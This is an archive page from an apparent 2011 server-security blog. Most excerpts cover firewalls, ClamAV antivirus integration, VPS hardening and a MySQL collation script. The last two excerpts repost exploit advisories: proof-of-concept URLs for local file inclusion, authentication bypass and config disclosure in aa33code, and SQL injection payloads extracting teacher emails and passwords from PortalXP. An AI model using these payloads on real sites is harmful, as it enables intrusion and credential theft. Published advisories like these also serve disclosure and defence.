Home » Security

VPS iptables rule limit is too low

November 30th, 2011 | | 0 Comments »

You may come across with a “numiptent” error message while restarting iptables or whatever firewall (say csf) you have installed on your VPS. The error appear as follows: The VPS iptables rule limit (numiptent) is too low (200/250) – stopping firewall to prevent iptables blocking all connections There is a limit on the number of [...]

Steps to secure VPS?

November 29th, 2011 | | 0 Comments »

1.) Firewall Installation Installing firewall and various other related tools such as CSF, sim. These will prevent unauthorized access to your server and from brute force attacks. CSF (ConfigServer Firewall) http://www.configserver.com/free/csf/install.txt SIM (System Integrity Monitor) http://www.rfxnetworks.com/sim.php NSIV (Network Socket Inode Validation) http://www.rfxnetworks.com/nsiv.php LES (Linux Environment Security) http://www.rfxnetworks.com/les.php these do not prevent exploits of services which [...]

HOWTO: CSF Firewall + LFD Login Failure Daemon

November 29th, 2011 | | 0 Comments »

The following is a guide to installing ConfigServer Services‘ firewall and login failure daemon. Warning: The Latest version of CSF does not work properly with DirectAdmin on CentOS 5 machines with Apache 2+ CSF + LFD is a full security suite. I have provided a list of the features that I have personally tested and [...]

FreeBSD ipfw Traffic Shaping Firewall Script

November 29th, 2011 | | 0 Comments »

# Based upon Khairil Yusof rules FreeBSD IPFW example firewall script to shape traffic for your LAN and WAN network. #firewall command fwcmd=”/sbin/ipfw” #interfaces wifi=ath0 wire=fxp0 oif=tun0 vpn=tun1 internal=”10.1.1.0/24,192.168.1.0/24,192.168.3.0/24″ fw=”skipto 1000″ nat_in=”skipto 2000″ nat_out=”skipto 5000″ cs=”skipto 3000″ # Force a flushing of the current rules before we reload. $fwcmd -f flush #Setup incoming and outgoing [...]

HOWTO: ProFTPD Antivirus using CLAMAV

November 29th, 2011 | | 0 Comments »

This howto is about making ProFTPD work with CLAMAV to scan all files uploaded by users using a FTP client. Recently our customers are having real difficulty with Iframe viruses, Php shells and other kind of windows viruses are also a headache always. ClamAV is already working with exim mail server in our servers for [...]

How to change the collation for all tables in a MySQL database to UTF-8?

November 29th, 2011 | | 0 Comments »

Changing the collation for all tables in a MySQL database can be time consuming depending on how many tables you have. That’s why we recommend using the following PHP script for changing the collation for all tables at a time: <?php $db = mysql_connect(‘localhost’,’myuser_mydbuser‘,’mypassword‘); if(!$db) echo “Cannot connect to the database – incorrect details”; mysql_select_db(‘myuser_mydbname’); [...]

Installing ClamAV antivirus and integrating with Exim and pure-ftpd

November 28th, 2011 | | 0 Comments »

Every good server must have a good antivirus installed. Let’s install ClamAV to our machine. Paths to distributions are provided to the latest versions at the time of writting. If new version releases all you need to do is to change numbers in shell command. SSH to your server Step 1. Installing prerequisites. Clam uses [...]

Mobilelib Gold v3 (Auth Bypass/SQL) Multiple Remote Vulnerabilities

November 28th, 2011 | | 0 Comments »

——————Mobilelib Gold v3 (Auth Bypass/SQL) Multiple Remote Vulnerabilities—————————- # # #### # ### ## ### #### #### ### ##### #### #### ### # ### #### ###### ## # # ## # # # # # # # # # # # # # # # # # # # ## # # # # # [...]

aa33code 0.0.1 (LFI/Auth Bypass/DCD) Multiple Remote Vulnerabilites

November 28th, 2011 | | 0 Comments »

################################################################################## [+] aa33code 0.0.1 (LFI/Auth Bypass/DCD) Multiple Remote Vulnerabilites [+] Discovered By SirGod [+] http://insecurity-ro.org [+] http://h4cky0u.org ################################################################################## [+] Download : http://sourceforge.net/projects/aa33code/files/aa33code/0.0.1/aa33code-0.0.1.tar.gz/download [+] Local File Inclusion – PoC http://127.0.0.1/[path]/reviews.php?artid=../../../../../../boot.ini%00 [+] Authentication Bypass – PoC http://127.0.0.1/[path]/artedit/main.php?aa33user=admin [+] Database Configuration Disclosure – PoC http://127.0.0.1/[path]/inc/mysql.inc ################################################################################## # milw0rm.com [2009-08-01] Incoming search terms:centos LFI (3)what is the extension 1lfi [...]

PortalXP – Teacher Edition 1.2 Multiple SQL Injection Vulnerabilities

November 28th, 2011 | | 0 Comments »

############################################################################## [+] PortalXP – Teacher Edition 1.2 Multiple SQL Injection Vulnerabilities [+] Discovered By SirGod [+] http://insecurity-ro.org [+] http://h4cky0u.org ##############################################################################   [+] Download : http://sourceforge.net/projects/portalxp/files/portalxp%20-%20teacher%20edition/Version%201.2/PortalXP1-2.zip/download [+] SQL Injection – PoC’s http://127.0.0.1/calendar.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher– http://127.0.0.1/news.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher– http://127.0.0.1/links.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher– http://127.0.0.1/assignments.php?assignment_id=1+union+all+select+1,2,3,4,concat_ws(0x3a,email,teacherpass),6,7,8,9+from+teacher– ########################################################################################################################################### # milw0rm.com [2009-08-01] Incoming search terms:oracle sql teacher\s edition (1)tutorial sql injection concat_ws (1)

First«56789»